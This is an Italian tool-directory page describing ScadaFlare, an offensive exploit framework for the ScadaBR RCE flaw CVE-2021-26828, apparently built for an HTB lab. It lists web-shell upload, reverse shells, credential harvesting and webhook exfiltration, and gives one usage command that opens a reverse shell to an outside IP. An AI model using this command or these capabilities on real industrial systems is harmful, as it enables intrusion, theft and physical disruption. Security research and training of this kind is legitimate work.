Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Framework di exploit RCE autenticata per ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Strumenti/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Generazione di PayloadAnalisi delle VulnerabilitàExploitSicurezza SCADA/ICSSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare Framework di exploit RCE autenticata per ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

599 mesi faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ScadaFlare - Toolkit di sfruttamento RCE autenticato CVE-2021-26828

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Un exploit RCE modulare post-autenticazione che prende di mira ScadaBR <1.1.0, potenziato per le operazioni red team.

ScadaFlare Demo

Funzionalità

  • Carica shell .jsp armate tramite view_edit.shtm
  • Supporta payload Linux e Windows
  • Supporto proxy SOCKS5 / HTTP
  • Trigger di reverse shell (standard o base64)
  • Moduli di enumerazione (DB, credenziali, Log4Shell, ecc.)
  • Esfiltrazione via webhook (Slack / Discord)
  • Generazione di script resource Metasploit
  • Supporto alla pulizia (kill switch)
  • Mappatura delle tecniche MITRE ATT&CK

    FaseTecnicaID
    Accesso iniziale (post-autenticazione)Account validiT1078
    EsecuzioneSfruttamento di applicazioni esposte al pubblicoT1190
    Esecuzione di comandiWeb shellT1505.003
    Azioni privilegiateModifica di contenuti webT1505
    Accesso alle credenzialiCredenziali nei file di configurazioneT1552.001
    ScopertaScoperta di sistemi remotiT1018
    EsfiltrazioneEsfiltrazione tramite servizio webT1567.002
    Evasione della difesaTunneling di proxy e protocolloT1090

    CVE

    • CVE-2021-26828
    • Scoperta da Fellipe Oliveira
    • Exploit migliorato e reso modulare

    Perché esiste

    Questo exploit è stato sviluppato durante l'analisi dello scenario HTB Pro Lab: Alchemy. Il PoC originale di Fellipe Oliveira era solido, ma:

    • Scritto in Python 2
    • Privo di funzionalità moderne come supporto proxy, pulizia della shell e concatenamento dell'enumerazione
    • Difficile da estendere o integrare nei flussi di lavoro red team

    Questa versione, ScadaFlare, è una riscrittura completa in Python 3 con supporto modulare, molteplici strategie di evasione, override del rilevamento del sistema operativo, integrazione webhook, supporto proxy SOCKS e catene di enumerazione per l'uso operativo nel mondo reale.

    Utilizzo

    root@kitploit:~
    python3 scadaflare.py http://172.16.0.20:80 admin admin \
      --reverse-ip 10.10.14.44 --reverse-port 4445 \
      --verbose --cleanup
    

    Solo uso legale ed etico

    ScadaFlare è progettato esclusivamente per:

    • Formazione sull'hacking etico
    • Test in laboratorio SCADA
    • Ricerca difensiva e validazione delle vulnerabilità

    L'uso non autorizzato contro sistemi industriali reali può:

    • Interrompere processi fisici
    • Causare danni o pericoli per la sicurezza
    • Comportare gravi conseguenze legali

    Utilizzando questo strumento accetti la piena responsabilità di:

    • Ottenere un'autorizzazione scritta esplicita
    • Operare solo in ambienti approvati

    Licenza

    Licenza MIT – consulta LICENSE

    Scarica lo strumento